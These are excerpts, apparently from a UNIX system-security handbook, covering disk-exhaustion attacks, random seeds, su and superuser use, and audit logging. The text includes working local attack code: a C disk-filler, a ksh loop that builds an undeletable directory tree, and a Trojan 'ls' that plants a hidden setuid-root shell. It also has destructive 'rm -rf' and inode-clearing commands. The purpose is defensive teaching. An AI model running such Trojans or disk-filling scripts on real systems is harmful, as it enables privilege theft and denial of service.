[5] This is yet another example of how non-standard UNIX has become, and why we have not given more examples of how to set up each and every system for each option we have explained. It is also a good illustration of why you should consult your vendor documentation to see how to interpret our suggestions appropriately for your release of the operating system.
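Once the filesystem table has been edited, the enabling steps look roughly like the following sketch; the exact command names and options vary slightly between systems:

# quotacheck -a     # build or verify the quota files on all quota-enabled filesystems
# quotaon -a        # turn quota enforcement on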

Last of all, you can edit an individual user's quotas with the edquota command:

# edquota spaf

If you want to "clone" the same set of quotas to multiple users and your version of the command supports the -p option, you can do so by using one user's quotas as a "prototype":

# edquota -p spaf simsong beth kathy

You and your users can view quotas with the quota command; see your documentation for particular details.

25.2.2.6 Reserved space

Versions of UNIX that use a filesystem derived from the BSD Fast Filesystem (FFS) have an additional protection against filling up the disk: the filesystem reserves approximately 10% of the disk and makes it unusable by regular users. The reason for reserving this space is performance: the BSD Fast Filesystem does not perform as well if less than 10% of the disk is free. However, this restriction also prevents ordinary users from overwhelming the disk. The restriction does not apply to processes running with superuser privileges.

This "minfree" value (10%) can be set to other values when the partition is created. It can also be changed afterwards using the tunefs command, but setting it to less than 10% is probably not a good idea.

The Linux ext2 filesystem also allows you to reserve space on your filesystem. The amount of space that is reserved, 10% by default, can be changed with the tune2fs command.
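For example, the reserved percentage can be adjusted as sketched below; the device names are illustrative, and you should check your own tunefs and tune2fs manual pages before running either command:

# tunefs -m 10 /dev/rdsk/c0t3d0s6    # FFS derivatives: set minfree to 10%
# tune2fs -m 10 /dev/hda2            # Linux ext2: set the reserved-block percentage to 10%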

25.2.2.7 Hidden space

Open files that are unlinked continue to take up space until they are closed. The space that these files take up will not appear with the du or find commands, because the files are not in the directory tree; nevertheless, they take up space, because they are still in the filesystem. For example:

#include <fcntl.h>
#include <unistd.h>

int
main(void)
{
    int  ifd;
    char buf[8192];

    /* Create a file, then immediately remove its directory entry. */
    ifd = open("./attack", O_WRONLY|O_CREAT, 0777);
    unlink("./attack");

    /* Keep writing: the blocks are consumed but belong to no visible file. */
    while (1)
        write(ifd, buf, sizeof(buf));
}

Files created in this way can't be found with the ls or du commands because the files have no directory entries.

To recover from this situation and reclaim the space, you must kill the process that is holding the file open. You may have to take the system into single-user mode and kill all processes if you cannot determine which process is to blame. After you've done this, run the filesystem consistency checker (e.g., fsck) to verify that the free list was not damaged during the shutdown operation.

You can more easily identify the program at fault by downloading a copy of the freeware lsof program from the net. This program will identify the processes that have open files, and the file position of each open file.[6] By identifying a process with an open file that has a huge current offset, you can terminate that single process to regain the disk space. After the process dies and the file is closed, all the storage it occupied is reclaimed.

[6] Actually, you should consider getting a copy of lsof for other reasons, too. It has an incredible number of other uses, such as determining which processes have open network connections and which processes have their current directories on a particular disk.
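If lsof is installed, two of its modes are particularly useful here (a sketch; option support may differ between lsof releases):

# lsof +L1       # list open files whose link count is zero - unlinked but still open
# lsof /home     # list every process with a file open on the /home filesystem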

25.2.2.8 Tree-structure attacks

It is also possible to attack a system by building a tree structure that is too deep to be deleted with the rm command. Such an attack could be caused by something like the following shell file:

#!/bin/ksh
#
# Don't try this at home!
#
while mkdir anotherdir
do
        cd ./anotherdir
        cp /bin/cc fillitup
done

On some systems, rm -r cannot delete this tree structure because the directory tree overflows either the buffer limits used inside the rm program to represent filenames or the number of open directories allowed at one time.

You can almost always delete a very deep set of directories by manually using the cd command from the shell to go to the bottom of the tree, and then deleting the files and directories one at a time. This process can be very tedious. Unfortunately, some UNIX systems do not let you chdir to a directory described by a path that contains more than a certain number of characters.

Another approach is to use a script similar to the one in Example 25-1:

Example 25-1: Removing Nested Directories

#!/bin/ksh
if (( $# != 1 ))
then
        print -u2 "usage: $0 directory-name"
        exit 1
fi
typeset -i index=1 dindex=0
typeset t_prefix="unlikely_fname_prefix" fname=$(basename $1)

cd $(dirname "$1")      # go to the directory containing the problem

while (( dindex < index ))
do
        for entry in $(ls -1a "$fname")
        do
                [[ "$entry" == @(.|..) ]] && continue
                if [[ -d "$fname/$entry" ]]
                then
                        rmdir - "$fname/$entry" 2>/dev/null && continue
                        mv "$fname/$entry" ./$t_prefix.$index
                        let index+=1
                else
                        rm -f - "$fname/$entry"
                fi
        done
        rmdir "$fname"
        let dindex+=1
        fname="$t_prefix.$dindex"
done

What this method does is delete the nested directories starting at the top. It deletes any files at the top level, and moves any nested directories up one level, giving each a temporary name. It then deletes the (now empty) top-level directory and begins anew with one of the former descendant directories. This process is slow, but it will work on almost any version of UNIX.

The only other way to delete such a directory on one of these systems is to remove the inode for the top-level directory manually, and then use the fsck command to erase the remaining directories. To delete these kinds of troubling directory structures this way, follow these steps:

1. Take the system to single-user mode.

2. Find the inode number of the root of the offending directory:

   # ls -i anotherdir
   1491 anotherdir
   #

3. Use the df command to determine the device of the offending directory:

   # /usr/bin/df anotherdir
   /g17 (/dev/dsk/c0t2d0s2 ): 377822 blocks 722559 files
   #

4. Clear the inode associated with that directory using the clri program:[7]

   [7] The clri command can be found in /usr/sbin/clri on Solaris systems. If you are using SunOS, use the unlink command instead.

   # clri /dev/dsk/c0t2d0s2 1491
   #

   (Remember to replace /dev/dsk/c0t2d0s2 with the name of the actual device reported by the df command.)

5. Run your filesystem consistency checker (for example, fsck /dev/dsk/c0t2d0s2) until it reports no errors. When the program tells you that there is an unconnected directory with inode number 1491 and asks if you want to reconnect it, answer "no." The fsck program will reclaim all the disk blocks and inodes used by the directory tree.

If you are using the Linux ext2 filesystem, you can delete an inode with the debugfs command. It is important that the filesystem be unmounted before you use debugfs.
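A sketch of such an ext2 session follows; the device name and inode number are illustrative, and you should check the debugfs documentation shipped with your e2fsprogs release:

# umount /dev/hda3
# debugfs -w /dev/hda3
debugfs:  clri <1491>
debugfs:  quit
# e2fsck /dev/hda3          # let the checker reclaim the orphaned blocks and inodes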

25.2.3 Swap Space Problems

Most UNIX systems are configured with some disk space for holding process memory images when they are paged or swapped out of main memory.[8] If your system is not configured with enough swap space, then new processes, especially large ones, will not run because there is no swap space for them. This failure often results in the error message "No space" when you attempt to execute a command.

[8] Swapping and paging are technically two different activities. Older systems swapped entire process memory images out to secondary storage; paging removes only portions of programs at a time. The use of the word "swap" has become so commonplace that most UNIX users use the word "swap" for both swapping and paging, so we will too.

If you run out of swap space because processes have accidentally filled up the available space, you can increase the space you've allocated to backing store. On SVR4 or SunOS systems, this increase is relatively simple to do, although you must give up some of your user filesystem. First, find a partition with some spare storage:

# /bin/df -ltk
Filesystem           kbytes     used    avail  capacity  Mounted on
/dev/dsk/c0t3d0s0     95359    82089     8505       91%  /
/proc                     0        0        0        0%  /proc
/dev/dsk/c0t1d0s2    963249   280376   634713       31%  /user2
/dev/dsk/c0t2d0s0   1964982  1048379   720113       59%  /user3
/dev/dsk/c0t2d0s6   1446222   162515  1139087       12%  /user4
#

In this case, partition /user4 appears to have lots of spare room. You can create an additional 50 MB of swap space on this partition with this command sequence on Solaris systems:

# mkfile 50m /user4/junkfile
# swap -a /user4/junkfile

On SunOS systems, type:

# mkfile 50m /user4/junkfile
# swapon /user4/junkfile

You can add this to the vfstab if you want the swap space to be available across reboots. Otherwise, remove the file as a swap device (swap -d /user4/junkfile) and then delete the file.

Correcting a shortage of swap space on systems that do not support swapping to files (such as most older versions of UNIX) usually involves shutting down your computer and repartitioning your hard disk.

If a malicious user has filled up your swap space, a short-term approach is to identify the offending process or processes and kill them. The ps command shows you the size of every executing process and helps you determine the cause of the problem. The vmstat command, if you have it, can also provide valuable process state information.
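The commands below sketch one way to start that hunt; the swap-summary command and the ps column used for process size differ between systems, so treat the field numbers as assumptions:

# swap -s                          # Solaris: summarize swap allocation
# pstat -s                         # SunOS/BSD equivalent
# ps -elf | sort -rn -k10 | head   # SVR4-style ps: largest SZ (size) fields first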

25.2.4 /tmp Problems

Most UNIX systems are configured so that any user can create files of any size in the /tmp directory. Normally, there is no quota checking enabled in the /tmp directory. Consequently, a single user can fill up the partition on which the /tmp directory is mounted, making it impossible for other users (and possibly the superuser) to create new files.

Unfortunately, many programs require the ability to store files in the /tmp directory to function properly. For example, the vi and mail programs both store temporary files in /tmp. These programs will fail unexpectedly if they cannot create their temporary files. Many locally written system administration scripts rely on the ability to create files in the /tmp directory, and do not check to make sure that sufficient space is available.

Problems with the /tmp directory are almost always accidental: a user copies a number of large files there, and then forgets them. Perhaps many users will do this.

In the early days of UNIX, filling up the /tmp directory was not much of a problem: the /tmp directory is automatically cleared when the system boots, and early UNIX computers crashed a lot. These days, UNIX systems stay up much longer, and the /tmp directory often does not get cleaned out for days, weeks, or months.

There are a number of ways to minimize the danger of /tmp attacks:

● Enable quota checking on /tmp, so that no single user can fill it up. A good quota is to allow each user to take up 40% of the space in /tmp. Thus, filling up /tmp will, under the best circumstances, require collusion among at least three users.

● Have a process that monitors the /tmp directory on a regular basis and alerts the system administrator if it is nearly filled. (A minimal cron-able sketch of such a monitor appears after this list.)
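The following is a rough sketch of such a monitor, suitable for running from cron; the df field positions, the 90% threshold, and the mail recipient are all assumptions you should adjust for your own system:

#!/bin/sh
# warn the administrator when /tmp climbs above 90% full
PCT=`df -k /tmp | tail -1 | awk '{ print $5 }' | sed 's/%//'`
if [ "$PCT" -gt 90 ]
then
        echo "/tmp is ${PCT}% full" | mail root
fi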



As the superuser, you might also want to sweep through the /tmp directory on a periodic basis and delete any files that are more than three or five days old:[9]

[9] Beware that this command may be vulnerable to the filename attacks described in Chapter 11.

# find /tmp -mtime +5 -print | xargs rm -rf

This line is a simple addition to your crontab for nightly execution.

25.2.5 Soft Process Limits: Preventing Accidental Denial of Service

Most modern versions of UNIX allow you to set limits on the maximum amount of memory or CPU time a process can consume, as well as the maximum file size it can create. These limits are handy if you are developing a new program and do not want to accidentally make the machine very slow or unusable for the other people with whom you're sharing it.

The Korn shell ulimit and C shell limit commands display the current process limits (use -H for hard limits, -S for soft limits):

$ ulimit -Sa
time(seconds)        unlimited
file(blocks)         unlimited
data(kbytes)         2097148 kbytes
stack(kbytes)        8192 kbytes
coredump(blocks)     unlimited
nofiles(descriptors) 64
vmemory(kbytes)      unlimited
$

These limits have the following meanings:

time
    Maximum number of CPU seconds your process can consume.

file
    Maximum file size that your process can create, reported in 512-byte blocks.

data
    Maximum amount of memory for data space that your process can reference.

stack
    Maximum stack your process can consume.

coredump
    Maximum size of a core file that your process will write; setting this value to 0 prevents you from writing core files.

nofiles
    Number of file descriptors (open files) that your process can have.

vmemory
    Total amount of virtual memory your process can consume.

You can also use the ulimit command to change a limit. For example, to prevent any future process you create from writing a data file longer than 5000 kilobytes (10,000 512-byte blocks), execute the following command:

$ ulimit -Sf 10000
$ ulimit -Sa
time(seconds)        unlimited
file(blocks)         10000
data(kbytes)         2097148 kbytes
stack(kbytes)        8192 kbytes
coredump(blocks)     unlimited
nofiles(descriptors) 64
vmemory(kbytes)      unlimited
$

To reset the limit, execute this command:

$ ulimit -Sf unlimited
$ ulimit -Sa
time(seconds)        unlimited
file(blocks)         unlimited
data(kbytes)         2097148 kbytes
stack(kbytes)        8192 kbytes
coredump(blocks)     unlimited
nofiles(descriptors) 64
vmemory(kbytes)      unlimited
$

Note that if you set a hard limit, you cannot increase it again unless you are currently the superuser. This makes hard limits handy to use in a system-wide profile to limit all your users.
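For instance, an /etc/profile fragment along the following lines would apply such limits to every sh or ksh user at login; the specific values are illustrative assumptions:

# cap core dumps and runaway output files for ordinary users
ulimit -H -c 0          # hard limit: no core files at all
ulimit -H -f 409600     # hard limit: no single file larger than about 200 MB
ulimit -S -f 102400     # softer default that users may raise up to the hard limit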



Chapter 23
Writing Secure SUID and Network Programs

23.8 Picking a Random Seed

Using a good random number generator is easy. Picking a random seed, on the other hand, can be quite difficult. Conceptually, picking a seed should be easy: pick something that is always different. But in practice, picking a seed - especially one that will be used as the basis of a cryptographic key - is quite difficult, because many things that change all the time actually change in predictable ways.

A stunning example of a poorly chosen seed for a random number generator appeared on the front page of the New York Times [14] in September 1995. The problem was in Netscape Navigator, a popular program for browsing the World Wide Web. Instead of using truly random information for seeding the random number generator, Netscape's programmers used a combination of the current time of day, the PID of the running Netscape program, and the parent process ID (PPID). Researchers at the University of California at Berkeley discovered that they could, through a process of trial and error, discover the numbers that any copy of Netscape was using and crack the encrypted messages with relative ease.

[14] John Markoff, "Security Flaw Is Discovered in Software Used in Shopping," The New York Times, September 19, 1995, p. 1.

Another example of a badly chosen seed-generation routine was used in Kerberos version 4. This routine was based on the time of day XORed with other information. The XOR effectively masked out the other information and resulted in a seed with only 20 bits of unpredictable value. This reduced the key space from more than 72 quadrillion possible keys to slightly more than one million, allowing keys to be guessed in a matter of seconds. When this weakness was discovered at Purdue's COAST Laboratory, conversations with personnel at MIT revealed that they had known for years that this problem existed, but the patch had somehow never been released.

In the book Network Security: Private Communication in a Public World, Kaufman et al. identify three typical mistakes made when picking random-number seeds:

1. Seeding a random number generator from a limited space.

   If you seed your random number generator with an 8-bit number, your generator has only one of 256 possible initial seeds. You will only ever get 256 possible sequences of random numbers out of the function (even if your generator has 128 bytes of internal state).

2. Using a hash value of only the current time as a random seed.

   This practice was the problem with the Netscape security bug. The problem was that even though the UNIX operating system API appears to return the current time to the nearest microsecond, most operating systems have a resolution considerably coarser - usually 1/60th of a second or worse. As Kaufman et al. point out, if a clock has only 1/60th-of-a-second granularity, and the intruder knows to the nearest hour at what time the current time was sampled, then there are only 60x60x60 = 216,000 possible values for the supposedly random seed.

3. Divulging the seed value itself.

   In one case reported by Kaufman et al., and originally discovered by Jeff Schiller of MIT, a program used the time of day to choose a per-message encryption key. The problem in this case was that the application included the time that the message was generated in the unencrypted header of the message.

How do you pick a good random seed? Here are some ideas:

1. Use a genuine source of randomness, such as a radioactive source, static on the FM dial, thermal noise, or something similar.

   Measuring the timing of hard disk drives can be another source of randomness, provided that you can access the hardware at a sufficiently low level.

2. Ask the user to type a set of text, and sample the time between keystrokes.

   If you get the same amount of time between two keystrokes, throw out the second value; the user is probably holding down a key and the key is repeating. (This technique is used by PGP as a source of randomness for its random number generator.)

3. Monitor the user.

   Each time the user presses the keyboard, take the time between the current keypress and the last keypress, add it to the current random number seed, and hash the result with a cryptographic hash function. You can also use mouse movements to add still more randomness.

4. Monitor the computer.

   Use readily available, constantly changing information, such as the number of virtual memory pages that have been paged in, the status of the network, and so forth.
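A rough illustration of the "monitor the computer" idea is sketched below. It assumes an MD5 digest program (here called md5) is installed, and the particular commands sampled are arbitrary; the point is simply to hash together output that changes rapidly and is hard for an outsider to predict:

#!/bin/sh
# combine several rapidly changing system statistics into one 128-bit value
( date; ps -ef; netstat -n; vmstat; ls -l /tmp ) 2>/dev/null | md5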

In December 1994, Donald Eastlake, Steve Crocker, and Jeffrey Schiller prepared RFC 1750, which made many observations about picking seeds for random number generators. Among them:

1. Avoid relying on the system clock.

   Many system clocks are surprisingly non-random. Many clocks that claim to provide accuracy actually don't, or they don't provide good accuracy all the time.

2. Don't use Ethernet addresses or hardware serial numbers.

   Such numbers are usually "heavily structured" and have "heavily structured subfields." As a result, one could easily try all of the possible combinations, or guess the value based on the date of manufacture.

3. Beware of using information such as the time of the arrival of network packets.

   Such external sources of randomness could be manipulated by an adversary.

4. Don't use random selection from a large database (such as a CD-ROM) as a source of randomness.

   The reason, according to RFC 1750, is that your adversary may have access to the same database. The database may also contain unnoticed structure.

5. Consider using analog input devices already present on your system.

   For example, RFC 1750 suggests using the /dev/audio device present on some UNIX workstations as a source of random numbers. The stream is further compressed to remove systematic skew. For example:

   $ cat /dev/audio | compress - >random-bit-stream

   RFC 1750 advises that the microphone not be connected to the audio input jack, so that the /dev/audio device will pick up random electrical noise. This advice may not hold on all hardware platforms; you should check your hardware with the microphone turned on and with no microphone connected to see which way gives a "better" source of random numbers.



Chapter 4
Users, Groups, and the Superuser

4.3 su: Changing Who You Claim to Be

Sometimes, one user must assume the identity of another. For example, you might sit down at a friend's terminal and want to access one of your protected files. Rather than forcing you to log your friend out and log yourself in, UNIX gives you a way to change your user ID temporarily. It is called the su command, short for "substitute user." su requires that you provide the password of the user to whom you are changing.

For example, to change yourself from tim to john, you might type:

% whoami
tim
% su john
password: fuzbaby
% whoami
john
%

You can now access john's files. (And you will be unable to access tim's files, unless those files are specifically available to the user john.)

4.3.1 Real and Effective UIDs

Processes on UNIX systems have at least two identities at every moment. Normally, these two identities are the same. The first identity is the real UID. The real UID is your "real identity" and matches up (usually) with the username you logged in as. Sometimes you may want to take on the identity of another user to access some files or execute some commands. You might do this by logging in as that user, thus obtaining a new command interpreter whose underlying process has a real UID equal to that user's.

Alternatively, if you only want to execute a few commands as another user, you can use the su command, as described above, to create a new process. This runs a new copy of your command interpreter (shell) that has the identity (real UID) of the other user. To use the su command, you must either know the password for the other user's account, or you must currently be running as the superuser.

There are times when a software author wants a single command to execute with the rights and privileges of another user - most often, the root user. In a case such as this, we certainly don't want to disclose the password to the root account, nor do we want the user to have access to a command interpreter running as root. UNIX addresses this problem through the use of a special kind of file designation called setuid or SUID. When a SUID file is run, the process involved takes on an effective UID that is the same as the owner of the file, but the real UID remains the same. SUID files are explained in the following chapter.

4.3.2 Saved IDs

Some versions of UNIX have a third form of UID: the saved UID. In these systems, a user may run a setuid program that sets an effective UID of 0 and then sets some different real UID as well. The saved UID is used by the system to allow the user to set the identity back to its original value. Normally, this is not something the user can see, but it can be important when you are writing or running setuid programs.

4.3.3 Other IDs

UNIX also has the analogous concepts of effective GID, real GID, and setgid for groups.

Some versions of UNIX also have session IDs, process group IDs, and audit IDs. A session ID is associated with the processes connected to a terminal, and can be thought of as indicating a "login session." A process group ID designates a group of processes that are in the foreground or background on systems that allow job control. An audit ID identifies a thread of activity that the audit mechanism treats as coming from the same source. We will not describe any of these further in this book because you don't really need to know how they work. However, now you know what they are if you encounter their names.

4.3.4 Becoming the Superuser

Typing su without a username tells UNIX that you wish to become the superuser. You will be prompted for a password. Typing the correct root password causes a shell to be run with a UID of 0. When you become the superuser, your prompt should change to the pound sign (#) to remind you of your new powers. For example:

% /bin/su -
password: k697dgf
# whoami
root
#

When using the su command to become the superuser, you should always type the command's full pathname, /bin/su. By typing the full pathname, you are assuring that you are actually running the real /bin/su command, and not another command named su that happens to be in your search path. This method is a very important way of protecting yourself (and the superuser password) from capture by a Trojan horse. Other techniques are described in Chapter 11; also see the sidebar "Stealing Superuser" later in this chapter.

Notice the use of the dash in the example above. Most versions of the su command support an optional argument of a single dash. When supplied, this causes su to invoke its subshell with a dash, which causes the shell to read all relevant startup files and simulate a login. Using the dash option is important when becoming the superuser: it assures that you will be using the superuser's path, and not the path of the account from which you su'ed.

To exit the subshell, type exit or press control-D.

If you use the su command to change to another user while you are the superuser, you won't be prompted for the password of the user into whom you are changing yourself. (This makes sense; as the superuser, you could as easily change that user's password and then log in as that user.) For example:

# su john
% whoami
john
%

Once you have become the superuser, you are free to perform whatever system administration you wish.

Using su to become the superuser is not a security hole. Any user who knows the superuser password could also log in as the superuser; breaking in through su is no easier. In fact, su enhances security: many UNIX systems can be set up so that every su attempt is logged, with the date, time, and user who typed the command. Examining these log files allows the system administrator to see who is exercising superuser privileges - as well as who shouldn't be!

4.3.5 Using su with Caution

If you are the system administrator, you should be careful about how you use the su command. Remember, if you su to the superuser account, you can do things by accident that you would normally be protected from doing. You could also accidentally give away access to the superuser account without knowing you did so.

As an example of the first case, consider the real instance of someone we know who thought that he was in a temporary directory in his own account and typed rm -rf *. Unfortunately, he was actually in the /usr/lib directory, and he was operating as the superuser. He spent the next few hours restoring tapes, checking permissions, and trying to soothe irate users. The moral of this small vignette, and of hundreds more we could relate with similar consequences, is that you should not be issuing commands as the superuser unless you need the extra privileges. Program construction, testing, and personal "housecleaning" should all be done under your own user identity.

An example of the second case is when you accidentally execute a Trojan horse program instead of the system command you thought you executed. (See the sidebar later in this chapter.) If something like this happens to you as user root, full access to your system can be given away. We discuss some defenses to this in Chapter 11, but one major suggestion is worth repeating: if you need access to someone else's files, su to that user ID and make the accesses as that user rather than as the superuser.

For instance, if a user reports a problem with files in her account, you might not be able to access her account or files from your own, regular account, so you could su to the root account and investigate. However, a better approach is to su to the superuser account, and then su to the user's account - you won't need her password for the second su after you are root. Not only does this method protect the root account, but you will also have some of the same access permissions as the user you are helping, and that will help you find the problem sooner.

Stealing Superuser

Once upon a time, many years ago, one of us needed access to the root account on an academic machine. Although we had been authorized by management to have root access, the local system manager didn't want to disclose the password. He asserted that access to the root account was dangerous (correct), that he had far more knowledge of UNIX than we did (unlikely), and that we didn't need the access (incorrect). After several diplomatic and bureaucratic attempts to get access normally, we took a slightly different approach, with management's wry approval.

We noticed that this user had "." at the beginning of his shell search path. This meant that every time he typed a command name, the shell would first search the current directory for a command of the same name. When he did a su to root, this search path was inherited by the new shell. This was all we really needed.

First, we created an executable shell file named ls in the current directory:

#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude      # stash away a copy of the shell
chmod 4555 ./stuff/junk/.superdude      # make it setuid root (root is running this)
rm -f $0                                # remove the evidence
exec /bin/ls ${1+"$@"}                  # then behave exactly like the real ls

Then, we executed the following commands:

% cd
% chmod 700 .
% touch ./-f

The trap was ready. We approached the recalcitrant administrator with the complaint, "I have a funny file in my directory I can't seem to delete." Because the directory was mode 700, he couldn't list the directory to see its contents. So, he used su to become user root. Then he changed to our home directory and issued the command ls to view the problem file. Instead of the system version of ls, he ran our version. This created a hidden setuid root copy of the shell, deleted the bogus ls command, and ran the real ls command. The administrator never knew what happened.

We listened politely as he explained (superciliously) that files beginning with a dash character (-) needed to be deleted with a pathname relative to the current directory (in our case, rm ./-f); of course, we knew that.

A few minutes later, he couldn't get the new root password.

4.3.6 Restricting su

On some versions of Berkeley-derived UNIX, a user cannot su to the root account unless the user is a member of the group wheel - or of any other group given the group ID of 0. For this restriction to work, the /etc/group entry for the wheel group must be non-empty; if the entry has no usernames listed, the restriction is disabled, and anyone who has the password can su to user root.

Some versions of su also allow members of the wheel group to become the superuser by providing their own passwords instead of the superuser password. The advantage of this feature is that you don't need to tell the superuser's password to a user for them to have superuser access - you simply have to put them into the wheel group. You can take away their access simply by taking them out of the group.

Some versions of System V UNIX require that users specifically be given permission to su. Different versions of UNIX accomplish this in different ways; consult your own system's documentation for details, and use the mechanism if it is available.

Another way to restrict the su program is by making it executable only by a specific group and by placing in that group only the people who you want to be able to run the command. For information on how to do this, see "Changing a File's Permissions" in Chapter 5.
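A sketch of that approach appears below; the group name "suusers" is an illustrative assumption, and su must remain setuid root for it to work at all:

# chgrp suusers /bin/su
# chmod 4750 /bin/su     # setuid root; only the owner and members of suusers may execute it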

4.3.7 The Bad su Log

Most versions of the su command log failed attempts. Older versions of UNIX explicitly logged bad su attempts to the console and in the /var/adm/messages file.[11] Newer versions log bad su attempts through the syslog facility, allowing you to send the messages to a file of your choice or to log facilities on remote computers across the network. (Some System V versions log to the file /var/adm/sulog in addition to syslog, or instead of it.)

[11] Many UNIX log files that are currently stored in the /var/adm directory were stored in the /usr/adm directory in previous versions of UNIX.

If you notice many bad attempts, it may well be an indication that somebody using an account on your system is trying to gain unauthorized privileges: this might be a legitimate user poking around, or it might be an indication that the user's account has been appropriated by an outsider who is trying to gain further access.

A single bad attempt, of course, might simply be a mistyped password, someone mistyping the du command, or somebody wondering what the su command does.[12]

[12] Which of course leads us to observe that people who try commands to see what they do shouldn't be allowed to run commands like su once they find out.

You can quickly scan the log file for bad su attempts with the grep command:

% grep BAD /var/adm/messages
BADSU 09/12 18:40 - pts/0 rachel-root

Good su attempts look like this:

% grep + /var/adm/sulog
SU 09/14 23:42 + pts/2 simsong-root
SU 09/16 08:40 + pts/4 simsong-root
SU 09/16 10:34 + pts/3 simsong-root

It would appear that Simson has been busy su'ing to root on September 14th and 16th.

4.3.7.1 The sulog under Berkeley UNIX

The /var/adm/messages log has a different format on computers running Berkeley UNIX:

% grep su: /var/adm/messages
Sep 11 01:40:59 bogus.com su: ericx to root on /dev/ttyu0
Sep 12 18:40:02 bogus.com su: BAD su rachel on /dev/ttyp1

In this example, user rachel tried to su on September 12th and failed. This is something we would investigate further to see if it really was Rachel.

4.3.8 Other Uses of su

On older versions of UNIX, the su command was frequently used in the crontab file to cause programs executed by cron to be run under different user IDs. A line from a crontab file to run the UUCP uuclean program (which trims the log files in the uucp directory) might have had the form:

0 4 * * * su uucp -c /usr/lib/uucp/uuclean

This use of su is now largely obsolete: the few systems that still use a single crontab file for all users now allow the username to be specified as the sixth field on each line of the crontab file:

0 4 * * * uucp /usr/lib/uucp/uuclean

Most versions of UNIX now use a version of the cron system that keeps a separate crontab file for each user, so there is no need to specify a username at all. Each file is given the username of the user for whom it is to be run; that is, cron commands to be run as root are placed in a file called root, while cron commands to be run as uucp are placed in a file called uucp. These files are often kept in the directory /usr/spool/cron/crontabs.

Nevertheless, you can still use the su command to run commands under different usernames. You might want to do this in some shell scripts. However, check your documentation as to the proper method of specifying options to be passed to the command via the su command line.



Chapter 10
10. Auditing and Logging

Contents:
The Basic Log Files
The acct/pacct Process Accounting File
Program-Specific Log Files
Per-User Trails in the Filesystem
The UNIX System Log (syslog) Facility
Swatch: A Log File Tool
Handwritten Logs
Managing Log Files

After you have established the protection mechanisms on your system, you will need to monitor them. You want to be sure that your protection mechanisms actually work. You will also want to observe any indications of misbehavior or other problems. This process of monitoring the behavior of the system is known as auditing. It is part of a defense-in-depth strategy: to borrow a phrase from several years ago, you should trust, but you should also verify.

UNIX maintains a number of log files that keep track of what's been happening to the computer. Early versions of UNIX used the log files to record who logged in, who logged out, and what they did. Newer versions of UNIX provide expanded logging facilities that record such information as files that are transferred over the network, attempts by users to become the superuser, electronic mail, and much more.

Log files are an important building block of a secure system: they form a recorded history, or audit trail, of your computer's past, making it easier for you to track down intermittent problems or attacks. Using log files, you may be able to piece together enough information to discover the cause of a bug, the source of a break-in, and the scope of the damage involved. In cases where you can't stop damage from occurring, at least you will have some record of it. Those logs may be exactly what you need to rebuild your system, conduct an investigation, give testimony, recover insurance money, or get accurate field service performed.

But beware: log files also have a fundamental vulnerability. Because they are often recorded on the system itself, they are subject to alteration or deletion. As we shall see, there are techniques that may help you to mitigate this problem, but no technique can completely remove it unless you log to a different machine.

Logging to a different machine is actually a good idea even if your system supports some other techniques to store the logs. Consider some method of automatically sending log files to a system on your network in a physically secured location. For example, sending logging information to a PC or Apple Macintosh provides a way of storing the logs on a machine that is considerably more difficult to break into and disturb. We have heard good reports from people who are able to use "outmoded" 80486 or 80386 PCs as log machines. For a diagram of such a setup, see Figure 10.1.

Figure 10.1: Secure logging host
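On systems that use the syslog facility (described later in this chapter), one simple way to forward a copy of the log messages to such a machine is sketched below. The host name loghost and the selector are assumptions, many syslogds require a tab between the selector and the action, and the location of syslogd's pid file varies between systems:

*.info;auth.notice          @loghost

# kill -HUP `cat /etc/syslog.pid`    # after editing /etc/syslog.conf, tell syslogd to reread it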

10.1 The Basic Log Files

Most log files are text files that are written line by line by system programs. For example, each time a user on your<br />

system tries to become the superuser by using the su command, the su program may append a single line to the log<br />

file sulog, which records whether the su attempt was successful or not.<br />

Different versions of <strong>UNIX</strong> store log files in different directories. The most common locations are:<br />

/usr/adm   Used by early versions of UNIX
/var/adm   Used by newer versions of UNIX, so that the /usr partition can be mounted read-only
/var/log   Used by some versions of Solaris, Linux, BSD, and FreeBSD to store log files

Within one of these directories (or a subdirectory in one of them) you may find variants of some or all of the<br />

following files:<br />

acct or pacct   Records commands run by every user

aculog          Records of dial-out modems (automatic call units)

lastlog         Logs each user's most recent successful login time, and possibly the last unsuccessful login too

loginlog        Records bad login attempts

messages        Records output to the system's "console" and other messages generated from the syslog facility

sulog           Logs use of the su command

utmp[1]         Records each user currently logged in

utmpx           Extended utmp

wtmp[2]         Provides a permanent record of each time a user logged in and logged out; also records system shutdowns and startups

wtmpx           Extended wtmp


vold.log        Logs errors encountered with the use of external media, such as floppy disks or CD-ROMs

xferlog         Logs FTP access

[1] Most versions of UNIX store the utmp file in the /etc directory.

[2] Early versions of System V UNIX stored the wtmp file in the /etc directory.

The following sections describe some of these files and how to use the <strong>UNIX</strong> syslog facility.<br />
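To see which of these directories and files your particular system actually uses, it is often enough simply to list the common locations; the exact set of names you see will vary with your vendor and release, and directories that do not exist will just produce a "not found" message:

% ls -l /usr/adm /var/adm /var/log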

C2 Audit<br />

Many <strong>UNIX</strong> systems allow the administrator to enable a comprehensive type of auditing (logging) known as " C2<br />

audit." This is so-named because it is logging of the form specified by U.S. Department of Defense regulations to<br />

meet the certification at the C2 level of trust. These regulations are specified in a document called the Trusted<br />

Computer System Evaluation Criteria (often referred to as the "Orange Book" in the "Rainbow Series").<br />

C2 auditing generally means assigning an audit ID to each group of related processes, starting at login. Thereafter,<br />

certain forms of system calls performed by every process are logged with the audit ID. This includes calls to open<br />

and close files, change directory, alter user process parameters, and so on.<br />

Despite the mandate for the general content of such logging, there is no generally accepted standard for the format.<br />

Thus, each vendor that provides C2-style logging seems to have a different format, different controls, and different<br />

locations for the logs. If you feel the need to enable such logging on your machine, we recommend that you read the<br />

documentation carefully. Furthermore, we recommend that you be careful about what you log so as not to generate<br />

lots of extraneous information, and that you log to a disk partition with lots of space.<br />

The last suggestion, above, reflects one of the biggest problems with C2 audit: it can consume a huge amount of<br />

space on an active system in a short amount of time. The other main problem with C2 audit is that it is useless<br />

without some interpretation and reduction tools, and these are not generally available from vendors - the DoD<br />

regulations only require that the logging be done, not that it be usable! Vendors have generally provided only as<br />

much as is required to meet the regulations and no more.<br />

Only a few third-party companies provide intrusion detection or audit-analysis tools: Stalker, from Haystack<br />

Laboratories, is one such product with some sophisticated features. Development of more sophisticated tools is an<br />

ongoing area of research for many people. We hope to be able to report something more positive in a third<br />

edition of this book.<br />

In the meantime, if you are not using one of these products, and you aren't at a DoD site that requires C2 logging,<br />

you may not want to enable C2 logging (unless you like filling up your disks with data you may not be able to<br />

